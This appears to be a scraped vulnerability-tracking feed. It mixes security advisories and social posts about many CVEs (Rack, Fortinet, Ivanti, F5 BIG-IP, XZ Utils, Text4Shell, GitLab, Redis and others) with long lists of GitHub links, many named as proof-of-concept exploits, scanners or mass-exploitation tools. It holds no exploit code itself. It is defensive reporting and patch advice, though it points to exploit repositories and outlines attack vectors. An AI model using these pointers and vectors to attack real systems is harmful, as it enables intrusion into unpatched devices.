First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.
Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.
It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️
So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!
##updated 2025-03-07T03:31:33
1 posts
Updated #curl bug bounty stats, six years in:
520 reports
78 confirmed security vulnerabilities
104 "informative" reports, bugs that weren't vulnerabilities
11 marked as "AI slop"
The rest were just different kinds of not applicable. Some more crazy than others.
The latest confirmed curl vulnerability (CVE-2025-0725) was reported 90 days ago.
There is currently zero issues in our queue.
##updated 2025-03-04T16:15:40.487000
4 posts
Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##updated 2025-02-24T18:32:12
1 posts
7 repos
https://github.com/AiK1d/CVE-2022-42475-RCE-POC
https://github.com/bryanster/ioc-cve-2022-42475
https://github.com/scrt/cve-2022-42475
https://github.com/Mustafa1986/cve-2022-42475-Fortinet
https://github.com/0xhaggis/CVE-2022-42475
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2025-02-14T20:15:34.350000
4 posts
Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##updated 2025-01-28T18:32:27
7 posts
10 repos
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
https://github.com/44xo/CVE-2025-0282
https://github.com/Hexastrike/Ivanti-Connect-Secure-Logs-Parser
https://github.com/AdaniKamal/CVE-2025-0282
https://github.com/almanatra/CVE-2025-0282
https://github.com/watchtowrlabs/CVE-2025-0282
https://github.com/punitdarji/Ivanti-CVE-2025-0282
https://github.com/sfewer-r7/CVE-2025-0282
Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html #news #IT
##JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html
More:
The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html @thehackernews #cybersecurity #Infosec #Ivanti #zeroday #malware
##DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks – Source:thehackernews.com https://ciso2ciso.com/dslogdrat-malware-deployed-via-ivanti-ics-zero-day-cve-2025-0282-in-japan-attacks-sourcethehackernews-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #DslogdRAT
##Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html #news #IT
##JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html
More:
The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html @thehackernews #cybersecurity #Infosec #Ivanti #zeroday #malware
##DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html
##DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html
##updated 2025-01-27T21:31:51
1 posts
2 repos
Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.
Example:
CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.
CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7
updated 2024-11-29T15:23:32.167000
1 posts
8 repos
https://github.com/cleverg0d/CVE-2024-21762-Checker
https://github.com/XiaomingX/cve-2024-21762-poc
https://github.com/h4x0r-dz/CVE-2024-21762
https://github.com/BishopFox/cve-2024-21762-check
https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check
https://github.com/rdoix/cve-2024-21762-checker
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2024-10-02T21:30:35
1 posts
4 repos
https://github.com/adhikara13/CVE-2024-9441
https://github.com/p33d/CVE-2024-9441
Nice reports critical flaw in Linear eMerge E3
Critical vulnerability CVE-2024-9441 (CVSS 9.8) in Nice's Linear eMerge E3 access control system allows unauthenticated remote attackers to execute arbitrary OS commands through the login_id parameter in the forgot_password functionality. All versions through 1.00-07 affected and no patch is currently available.
**If you are using Nice Linear eMerge E3 access control system, be aware that it's vulnerable. Make sure it's isolated from the internet and accessible only from trusted networks, and reach out to the vendor for patch timing.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/nice-reports-critical-flaw-in-linear-emerge-e3-8-q-a-y-1/gD2P6Ple2L
updated 2024-07-31T05:02:58
1 posts
Some nifty n-day vuln analysis from the team (Calum Hutton) this week: Citrix NetScaler Console CVE-2024-6235 allows an unauthenticated attacker to obtain an admin-level session ID from an internal API and use this to create other admin users on the system.
https://attackerkb.com/assessments/3bf5c123-41fa-47c5-9eb1-d139317061b8
##updated 2024-07-25T18:33:36
1 posts
57 repos
https://github.com/cybersecurityworks553/scanner-CVE-2020-5902
https://github.com/yasserjanah/CVE-2020-5902
https://github.com/ar0dd/CVE-2020-5902
https://github.com/jas502n/CVE-2020-5902
https://github.com/dunderhay/CVE-2020-5902
https://github.com/qiong-qi/CVE-2020-5902-POC
https://github.com/Shu1L/CVE-2020-5902-fofa-scan
https://github.com/GovindPalakkal/EvilRip
https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker
https://github.com/corelight/CVE-2020-5902-F5BigIP
https://github.com/Al1ex/CVE-2020-5902
https://github.com/0xAbdullah/CVE-2020-5902
https://github.com/qlkwej/poc-CVE-2020-5902
https://github.com/superzerosec/cve-2020-5902
https://github.com/wdlid/CVE-2020-5902-fix
https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902
https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker
https://github.com/west9b/F5-BIG-IP-POC
https://github.com/r0ttenbeef/cve-2020-5902
https://github.com/dnerzker/CVE-2020-5902
https://github.com/inho28/CVE-2020-5902-F5-BIGIP
https://github.com/jiansiting/CVE-2020-5902
https://github.com/ltvthang/CVE-2020-5903
https://github.com/34zY/APT-Backpack
https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter
https://github.com/rockmelodies/CVE-2020-5902-rce-gui
https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner
https://github.com/jinnywc/CVE-2020-5902
https://github.com/yassineaboukir/CVE-2020-5902
https://github.com/PushpenderIndia/CVE-2020-5902-Scanner
https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP
https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902
https://github.com/GoodiesHQ/F5-Patch
https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability
https://github.com/aqhmal/CVE-2020-5902-Scanner
https://github.com/murataydemir/CVE-2020-5902
https://github.com/renanhsilva/checkvulnCVE20205902
https://github.com/rwincey/CVE-2020-5902-NSE
https://github.com/ajdumanhug/CVE-2020-5902
https://github.com/haisenberg/CVE-2020-5902
https://github.com/momika233/cve-2020-5902
https://github.com/sv3nbeast/CVE-2020-5902_RCE
https://github.com/z3n70/CVE-2020-5902
https://github.com/flyopenair/CVE-2020-5902
https://github.com/zhzyker/CVE-2020-5902
https://github.com/k3nundrum/CVE-2020-5902
https://github.com/JSec1337/RCE-CVE-2020-5902
https://github.com/freeFV/CVE-2020-5902-fofa-scan
https://github.com/halencarjunior/f5scan
https://github.com/zhzyker/exphub
https://github.com/MrCl0wnLab/checker-CVE-2020-5902
https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
https://github.com/Any3ite/CVE-2020-5902-F5BIG
https://github.com/cristiano-corrado/f5_scanner
https://github.com/nsflabs/CVE-2020-5902
Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.
Example:
CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.
CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7
updated 2024-07-11T12:30:56
1 posts
Schneider Electric reports critical flaw in Wiser Home Controller WHC-5918A
The Schneider Electric Wiser Home Controller WHC-5918A contains a critical security vulnerability (CVE-2024-6407, CVSS 9.8) allowing attackers to extract sensitive credentials by sending specially crafted messages. Schneider is recommending complete replacement of the discontinued device with their newer C-Bus Home Controller model as no security patches will be released.
**If you are using Schneider Electric Wiser Home Controller WHC-5918A devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/schneider-electric-reports-critical-flaw-in-wiser-home-controller-whc-5918a-0-k-c-4-0/gD2P6Ple2L
updated 2024-04-04T04:45:33
1 posts
10 repos
https://github.com/delsploit/CVE-2023-27997
https://github.com/BishopFox/CVE-2023-27997-check
https://github.com/rio128128/CVE-2023-27997-POC
https://github.com/TechinsightsPro/ShodanFortiOS
https://github.com/puckiestyle/cve-2023-27997
https://github.com/lexfo/xortigate-cve-2023-27997
https://github.com/onurkerembozkurt/fgt-cve-2023-27997-exploit
https://github.com/imbas007/CVE-2023-27997-Check
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2024-03-29T18:30:50
1 posts
62 repos
https://github.com/badsectorlabs/ludus_xz_backdoor
https://github.com/been22426/CVE-2024-3094
https://github.com/emirkmo/xz-backdoor-github
https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer
https://github.com/r0binak/xzk8s
https://github.com/neuralinhibitor/xzwhy
https://github.com/jfrog/cve-2024-3094-tools
https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check
https://github.com/mightysai1997/CVE-2024-3094-info
https://github.com/0xlane/xz-cve-2024-3094
https://github.com/bioless/xz_cve-2024-3094_detection
https://github.com/iheb2b/CVE-2024-3094-Checker
https://github.com/harekrishnarai/xz-utils-vuln-checker
https://github.com/Horizon-Software-Development/CVE-2024-3094
https://github.com/crfearnworks/ansible-CVE-2024-3094
https://github.com/isuruwa/CVE-2024-3094
https://github.com/hackingetico21/revisaxzutils
https://github.com/przemoc/xz-backdoor-links
https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector
https://github.com/byinarie/CVE-2024-3094-info
https://github.com/robertdebock/ansible-playbook-cve-2024-3094
https://github.com/dah4k/CVE-2024-3094
https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker
https://github.com/ScrimForever/CVE-2024-3094
https://github.com/weltregie/liblzma-scan
https://github.com/wgetnz/CVE-2024-3094-check
https://github.com/robertdfrench/ifuncd-up
https://github.com/FabioBaroni/CVE-2024-3094-checker
https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094
https://github.com/buluma/ansible-role-cve_2024_3094
https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container
https://github.com/amlweems/xzbot
https://github.com/lockness-Ko/xz-vulnerable-honeypot
https://github.com/ackemed/detectar_cve-2024-3094
https://github.com/brinhosa/CVE-2024-3094-One-Liner
https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094
https://github.com/gustavorobertux/CVE-2024-3094
https://github.com/felipecosta09/cve-2024-3094
https://github.com/robertdebock/ansible-role-cve_2024_3094
https://github.com/reuteras/CVE-2024-3094
https://github.com/Juul/xz-backdoor-scan
https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check
https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits
https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione
https://github.com/pentestfunctions/CVE-2024-3094
https://github.com/XiaomingX/cve-2024-3094-xz-backdoor-exploit
https://github.com/bsekercioglu/cve2024-3094-Checker
https://github.com/Yuma-Tsushima07/CVE-2024-3094
https://github.com/shefirot/CVE-2024-3094
https://github.com/Fractal-Tess/CVE-2024-3094
https://github.com/Simplifi-ED/CVE-2024-3094-patcher
https://github.com/ashwani95/CVE-2024-3094
https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script
https://github.com/hazemkya/CVE-2024-3094-checker
https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker
https://github.com/DANO-AMP/CVE-2024-3094
https://github.com/mightysai1997/CVE-2024-3094
https://github.com/mesutgungor/xz-backdoor-vulnerability
https://github.com/teyhouse/CVE-2024-3094
Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack
Piotr Przymus (Nicolaus Copernicus University in Torun, Poland), Thomas Durieux (TU Delft & Endor Labs, The Netherlands)
https://arxiv.org/abs/2504.17473 https://arxiv.org/pdf/2504.17473 https://arxiv.org/html/2504.17473
arXiv:2504.17473v1 Announce Type: new
Abstract: The digital economy runs on Open Source Software (OSS), with an estimated 90\% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline, analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.
updated 2024-01-19T20:49:34
1 posts
49 repos
https://github.com/devenes/text4shell-cve-2022-42889
https://github.com/SeanWrightSec/CVE-2022-42889-PoC
https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889
https://github.com/MendDemo-josh/cve-2022-42889-text4shell
https://github.com/Sic4rio/CVE-2022-42889
https://github.com/sunnyvale-it/CVE-2022-42889-PoC
https://github.com/HKirito/CVE-2022-33980
https://github.com/smileostrich/Text4Shell-Scanner
https://github.com/Vulnmachines/text4shell-CVE-2022-42889
https://github.com/pwnb0y/Text4shell-exploit
https://github.com/kljunowsky/CVE-2022-42889-text4shell
https://github.com/Gotcha1G/CVE-2022-42889
https://github.com/dgor2023/cve-2022-42889-text4shell-docker
https://github.com/ClickCyber/cve-2022-42889
https://github.com/neerazz/CVE-2022-42889
https://github.com/YulinSec/t4scan
https://github.com/necroteddy/CVE-2022-42889
https://github.com/34006133/CVE-2022-42889
https://github.com/QAInsights/cve-2022-42889-jmeter
https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker
https://github.com/cxzero/CVE-2022-42889-text4shell
https://github.com/karthikuj/cve-2022-42889-text4shell-docker
https://github.com/joshbnewton31080/cve-2022-42889-text4shell
https://github.com/tulhan/commons-text-goat
https://github.com/akshayithape-devops/CVE-2022-42889-POC
https://github.com/808ale/CVE-2022-42889-Text4Shell-POC
https://github.com/stavrosgns/Text4ShellPayloads
https://github.com/aaronm-sysdig/text4shell-docker
https://github.com/jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL
https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker
https://github.com/kiralab/text4shell-scan
https://github.com/gokul-ramesh/text4shell-exploit
https://github.com/s3l33/CVE-2022-42889
https://github.com/korteke/CVE-2022-42889-POC
https://github.com/eunomie/cve-2022-42889-check
https://github.com/chainguard-dev/text4shell-policy
https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889
https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC
https://github.com/cryxnet/CVE-2022-42889-RCE
https://github.com/Afrouper/MavenDependencyCVE-Scanner
https://github.com/uk0/cve-2022-42889-intercept
https://github.com/rockmelodies/CVE-2022-42889
https://github.com/hotblac/text4shell
https://github.com/f0ng/text4shellburpscanner
https://github.com/Dima2021/cve-2022-42889-text4shell
https://github.com/humbss/CVE-2022-42889
https://github.com/securekomodo/text4shell-poc
Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 http://www.kitploit.com/2025/04/text4shell-exploit-custom-python-based.html
##More about the SAP NetWeaver zero-day vulnerability. A patch has been released.
Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday
##More about the SAP NetWeaver zero-day vulnerability. A patch has been released.
Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday
##Spring Security CVE-2025-22234 on spring-security-crypto
https://www.herodevs.com/vulnerability-directory/cve-2025-22234
Discussions: https://discu.eu/q/https://www.herodevs.com/vulnerability-directory/cve-2025-22234
##Spring Security CVE-2025-22234 on spring-security-crypto
https://www.herodevs.com/vulnerability-directory/cve-2025-22234
Discussions: https://discu.eu/q/https://www.herodevs.com/vulnerability-directory/cve-2025-22234
##Spring Security CVE-2025-22234 Introduces Username Enumeration Vector https://www.herodevs.com/vulnerability-directory/cve-2025-22234
##GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
This SQLi in Centreon Web is from a month ago but the CVE was published today.
sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
##Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.
A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.
This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.
Redis DoS.
https://github.com/redis/redis/security/advisories/GHSA-r67f-p999-2gff
sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
##Redis is an open source, in-memory database that persists on disk. In versions starting at 2.6 and prior to 7.4.3, An unauthenticated client can cause unlimited growth of output buffers, until the server runs out of memory or is killed. By default, the Redis configuration does not limit the output buffer of normal clients (see client-output-buffer-limit). Therefore, the output buffer can grow unlimitedly over time. As a result, the service is exhausted and the memory is unavailable. When password authentication is enabled on the Redis server, but no password is provided, the client can still cause the output buffer to grow from "NOAUTH" responses until the system will run out of memory. This issue has been patched in version 7.4.3. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways. Either using network access control tools like firewalls, iptables, security groups, etc, or enabling TLS and requiring users to authenticate using client side certificates.
Post-auth RCE in DataEase.
https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
sev:HIGH 8.2 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
##DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.
This is kind of a neat race condition:
https://github.com/AdeptLanguage/Adept/security/advisories/GHSA-8c7v-vccv-cx4q
sev:CRIT 9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
##Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there is a few seconds where an attacker can extract the token from the artifact and use it with the Github API to push malicious code or rewrite release commits in the AdeptLanguage/Adept repository. This issue has been patched in commit a1a41b7.
Security Advisory: Local privilege escalation in make-initrd-ng (CVE-2025-32438)
##